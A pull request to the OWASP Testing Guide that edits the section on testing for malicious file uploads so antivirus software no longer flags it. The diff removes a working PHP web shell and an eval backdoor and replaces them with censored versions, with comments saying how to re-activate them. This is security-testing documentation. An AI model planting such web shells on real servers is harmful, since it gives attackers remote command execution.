### PR TITLE
Fixes #78 Minimal change to prevent Windows Defender detection

### DIFF
--- a/document/4_Web_Application_Security_Testing/4.11_Business_Logic_Testing/4.11.9_Test_Upload_of_Malicious_Files_OTG-BUSLOGIC-009.md
+++ b/document/4_Web_Application_Security_Testing/4.11_Business_Logic_Testing/4.11.9_Test_Upload_of_Malicious_Files_OTG-BUSLOGIC-009.md
@@ -45,15 +45,18 @@ Generic Testing Method
 
 For example upload the 'WebShell-backdoor.php' to the target victim site.\
 
-`<?php`\
-`if(isset($_REQUEST['cmd'])){`\
-`echo "<pre>";`\
-`$cmd = ($_REQUEST['cmd']);`\
-`system($cmd);`\
-`echo "</pre>";`\
-`die;`\
-`}`\
-`?>`
+```php
+<?php
+    if(isset($_REQUEST['rq'])){
+        echo "<pre>";
+        $rq= ($_REQUEST['rq']);
+        /* Replace CENSORED with system ($rq) to activate the sample */
+        CENSORED;
+        echo "</pre>";
+        die;
+    }
+?>
+```
 
 Once it's uploaded, the testers/hackers may get the password by visiting the URL below.
 
@@ -65,7 +68,11 @@ or it may execute by remote file injection as below.
 
 Other PHP example:
 
-<?php @eval($_POST['password']);?>
+```php
+<?php @CENSORED($_POST['password']);?>
+```
+> Replace @CENSORED with @eval
+
 ### Invalid File
 
 • Set up the intercepting proxy to capture the “valid” request for an accepted file.


### PR DESCRIPTION
This PR covers issue #<issue number>.

- [ ] This PR handles the issue and requires no additional PRs.
- [ ] You have validated the need for this change.

**What did this PR accomplish?**

- This is an alternative to https://github.com/OWASP/OWASP-Testing-Guide-v5/pull/98 - this is more of a micro-patch, where the ONLY thing fixed is the AV detection. I even left the trailing backslash.
- VirusTotal - https://www.virustotal.com/gui/file-analysis/MzM4NTYzNDE3NDg2OTMzMjM3ZjgwMjgzZmUyZTQzNGE6MTU2MzczMzAxMQ==/detection

Thank you for your contribution!